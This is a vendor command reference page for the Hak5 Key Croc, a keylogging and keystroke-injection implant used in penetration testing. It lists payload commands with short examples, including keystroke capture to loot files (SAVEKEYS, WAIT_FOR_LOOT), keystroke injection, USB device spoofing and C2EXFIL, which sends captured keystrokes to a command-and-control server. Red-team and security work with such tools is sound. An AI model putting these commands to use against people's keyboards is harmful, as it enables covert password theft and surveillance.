Key Croc
  • The Key Croc by Hak5
  • Key Croc Basics
    • Serial Console Access
    • Updating the Firmware
    • Factory Reset
  • Configuration
    • Default Settings
    • Understanding Languages
  • Files and Directory Structure
    • Understanding the File System
  • Getting the Key Croc Online
  • Configuring Cloud C²
  • Writing Payloads
    • Payload Development
    • Ducky Script Commands
    • Command Quick Reference
    • The MATCH Command
    • The SAVEKEYS Command
    • The ATTACKMODE Command
      • USB Identifiers
    • The QUACK Command
    • Advanced QUACK Commands
    • The LED Command
  • Beginner Guides
    • Password Sniffing with the Key Croc — Easy, or Super Easy?
    • New Features in Key Croc 1.3
  • Tips & Tricks
    • Interactive Payload Development
    • Installing Extras like Metasploit
    • Helpful Payload Snippets
Powered by GitBook
On this page
  • MATCH
  • EXAMPLE
  • SAVEKEYS
  • EXAMPLE
  • QUACK
  • EXAMPLE
  • QUACKFILE
  • EXAMPLE
  • ATTACKMODE
  • EXAMPLE
  • LED
  • EXAMPLE
  • GET_VARS
  • RELOAD_PAYLOADS
  • CHECK_PAYLOADS
  • RECORD_PAYLOAD
  • ENABLE_PAYLOAD
  • EXAMPLE
  • DISABLE_PAYLOAD
  • EXAMPLE
  • INSTALL_EXTRAS
  • KEYBOARD
  • UDISK
  • WAIT_FOR_KEYBOARD_ACTIVITY
  • EXAMPLE
  • WAIT_FOR_KEYBOARD_INACTIVITY
  • EXAMPLE
  • WAIT_FOR_LOOT
  • EXAMPLE
  • C2NOTIFY
  • EXAMPLE
  • C2EXFIL
  • EXAMPLE

Was this helpful?

  1. Writing Payloads

Command Quick Reference

MATCH

MATCH <string or regular expression>

EXAMPLE

MATCH hello

Will trigger payload execution when specified pattern is typed.

See the MATCH article for full usage.

SAVEKEYS

SAVEKEYS </path/to/file> <NEXT | LAST> <number of keystrokes 1-255>

EXAMPLE

MATCH hello
SAVEKEYS /root/loot/test.log NEXT 6

Will save the specified number of keys to a file – either before (LAST) or after (NEXT) the payload MATCH.

See the SAVEKEYS article for full usage.

QUACK

QUACK <keystrokes to inject>

EXAMPLE

QUACK STRING hello world

Will inject keystrokes specified. See the QUACK article for full usage.

QUACKFILE

QUACKFILE </path/to/keystroke-injection-strings>

EXAMPLE

QUACK /root/udisk/payloads/my_ducky_script.txt

Will inject keystrokes from the specified file. Ducky Script commands in the specified file should not be prepended with Q or QUACK.

ATTACKMODE

ATTACKMODE <modes> <options>

EXAMPLE

ATTACKMODE HID ECM_ETHERNET VID_0X05AC PID_0X021E MAN_Hak5 SN_1337

Will emulate a USB device from the specified modes and options. See the ATTACKMODE article for full usage.

LED

LED <status>

EXAMPLE

LED SETUP

Will control the multi-color LED. See the LED article for full usage.

GET_VARS

GET_VARS

Will return a set of useful variables which may be referenced in the payload

  • $VID – Vendor ID cloned from attached keyboard or specified in config.txt

  • $PID – Product ID cloned from attached keyboard or specified in config.txt

  • $MAN – Manufacturer specified in config.txt

  • $SN – Serial number specified in config.txt

  • $PROD – Product string specified in config.txt

  • $HOST_IP – IP address of Key Croc after executing an Ethernet ATTACKMODE

  • $TARGET_IP – IP address of target after executing an Ethernet ATTACKMODE

  • $TARGET_HOSTNAME – Host name of the target after executing an Ethernet ATTACKMODE

The $LOOT variable is always available after MATCH triggers the payload. See the MATCH article for $LOOT details.

RELOAD_PAYLOADS

RELOAD_PAYLOADS

Will refresh the Key Croc framework with payload files from /root/udisk/payloads/

CHECK_PAYLOADS

CHECK_PAYLOADS

Will check the syntax of the payloads currently residing in /root/udisk/payloads/

RECORD_PAYLOAD

RECORD_PAYLOAD

Will parse each line entered, enabling interactive payload development with helpers.

ENABLE_PAYLOAD

ENABLE_PAYLOAD <payload_file_name>

EXAMPLE

ENABLE_PAYLOAD my_payload.txt

Will enable the specified payload. After enabling a payload, issue RELOAD_PAYLOADS for the change to take effect.

DISABLE_PAYLOAD

DISABLE_PAYLOAD <payload_file_name>

EXAMPLE

DISABLE_PAYLOAD my_payload.txt

After disabling a payload, issue RELOAD_PAYLOADS for the change to take effect.

INSTALL_EXTRAS

INSTALL_EXTRAS

Will install additional third party software such as metasploit, impacket and responder to the /tools/ directory.

KEYBOARD

KEYBOARD

Will return PRESENT or MISSING depending on whether a keyboard is attached.

UDISK

udisk [ mount | unmount | remount | reformat ]

WAIT_FOR_KEYBOARD_ACTIVITY

WAIT_FOR_KEYBOARD_ACTIVITY <refresh interval in seconds>

EXAMPLE

WAIT_FOR_KEYBOARD_ACTIVITY 1

Will check for keyboard activity for each specified time interval, halting further payload execution until keyboard activity is detected. Example wait until there is keyboard activity within a 1 second window.

WAIT_FOR_KEYBOARD_INACTIVITY

WAIT_FOR_KEYBOARD_INACTIVITY <seconds of inactivity required>

EXAMPLE

WAIT_FOR_KEYBOARD_INACTIVITY 300

Will check for keyboard inactivity, halting further payload execution until the specified time has elapsed with no keyboard activity. Example will wait until there have been no keypresses for 5 minutes (300 seconds)

WAIT_FOR_LOOT

WAIT_FOR_LOOT </path/to/file> (optional)<refresh interval in seconds>

EXAMPLE

WAIT_FOR_LOOT /root/loot/captured_keys.txt 5

Will wait for the specified file to exist, or if already existing for the file line count to increase, halting further payload execution. Can be used in conjunction with SAVEKEYS NEXT, which will write the loot file when the number of specified keys have been typed. Example will wait until the captured_keys.txtfile exists, checking every 5 seconds.

C2NOTIFY

C2NOTIFY <INFO|WARN|ERROR> <MESSAGE>

EXAMPLE

C2NOTIFY INFO 'The cake is a lie'

Will send a notification to the configured Cloud C2 server. See the Configuring Cloud C2 article.

C2EXFIL

C2EXFIL (optional)STRING (required)<PATH> (optional)<SOURCE>

EXAMPLE

C2EXFIL STRING /root/loot/captured_keys.txt My_Payload

Will exfiltrate the specified file to the configured Cloud C2 server. See the Configuring Cloud C2 article.

Last updated 1 year ago

Was this helpful?